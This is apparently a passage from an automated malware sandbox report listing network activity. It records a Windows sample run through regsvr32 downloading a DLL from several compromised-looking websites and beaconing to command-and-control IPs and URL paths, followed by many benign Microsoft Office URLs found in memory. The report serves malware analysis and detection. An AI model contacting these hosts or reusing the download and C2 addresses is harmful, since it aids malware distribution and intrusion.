Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK | Server: nginx | Date: Sun, 13 Nov 2022 18:27:03 GMT | Content-Type: application/x-msdownload | Content-Length: 433152 | Connection: keep-alive | Set-Cookie: 637136f7d44c4=1668364023; expires=Sun, 13-Nov-2022 18:28:03 GMT; Max-Age=60; path=/ | Cache-Control: no-cache, must-revalidate | Pragma: no-cache | Last-Modified: Sun, 13 Nov 2022 18:27:03 GMT | Expires: Sun, 13 Nov 2022 18:27:03 GMT | Content-Disposition: attachment; filename="2yXcjy57oZTTUNweDidCGUY.dll" | Content-Transfer-Encoding: binary
Source: global traffic HTTP traffic detected: GET /img/O8G0RDZj7MYCuJyPoP/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: datie-tw.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cgi-bin/WFFcGx/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: copunupo.ac.zmConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /upload/VaOfWEb3pW76UO/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sbm.xinmoshiwang.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/4cChao/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: ly.yjlianyi.topConnection: Keep-Alive
Source: global traffic TCP traffic: 192.168.2.3:49709 -> 45.63.99.23:7080
Source: unknown Network traffic detected: IP country count 24
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 13 Nov 2022 18:26:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33
Source: unknown TCP traffic detected without corresponding DNS query: 173.255.211.88
Source: unknown TCP traffic detected without corresponding DNS query: 45.63.99.23
Source: unknown TCP traffic detected without corresponding DNS query: 182.162.143.56
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: regsvr32.exe, 0000000A.00000003.2012430306.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2065411138.0000000000A55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: regsvr32.exe, 0000000A.00000003.2012430306.0000000000C55000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2065411138.0000000000A55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: regsvr32.exe, 0000000A.00000003.2012380786.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416327091.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012998285.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://182.162.143.56/
Source: regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2066014930.00000000009FC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2415143218.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/
Source: regsvr32.exe, 0000000C.00000003.2066707011.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.2416113424.0000000000A46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/F
Source: regsvr32.exe, 0000000A.00000003.2012257870.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012973980.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012356542.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416244353.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416063327.0000000000C34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012912551.0000000000C36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://182.162.143.56/tkafmhcgcid/
Source: regsvr32.exe, 0000000A.00000003.2012257870.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.2416063327.0000000000C34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.2012912551.0000000000C36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://182.162.143.56/tkafmhcgcid//~G
Source: regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000003.1927895860.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/
Source: regsvr32.exe, 0000000A.00000003.1927414494.0000000000C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/2
Source: regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/b
Source: regsvr32.exe, 0000000C.00000003.2004856729.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.2004490975.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/
Source: regsvr32.exe, 0000000C.00000003.2004490975.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/%
Source: regsvr32.exe, 0000000A.00000003.1927257389.0000000000C31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/tkafmhcgcid/
Source: regsvr32.exe, 0000000A.00000003.1927693196.0000000000C0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/tkafmhcgcid/8eM
Source: regsvr32.exe, 0000000A.00000003.1927257389.0000000000C31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://45.63.99.23:7080/tkafmhcgcid/~G
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.aadrm.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.aadrm.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.cortana.ai
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.office.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.onedrive.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/imports
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://api.scheduler.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://augloop.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cdn.entity.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://clients.config.office.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://config.edge.skype.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cortana.ai
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cortana.ai/api
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://cr.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dev.cortana.ai
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://devnull.onenote.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://directory.services.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601292631425
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://fpastorage.cdn.office.net/%s
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://graph.windows.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://graph.windows.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://invites.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://lifecycle.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://login.windows.local
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://management.azure.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://management.azure.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.action.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.engagement.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://messaging.office.com/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://my.microsoftpersonalcontent.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://ncus.contentsync.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://officeapps.live.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://onedrive.live.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://osi.office.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://otelrules.azureedge.net
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://outlook.office.com
Source: E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.dr String found in binary or memory: https://outlook.office.com/
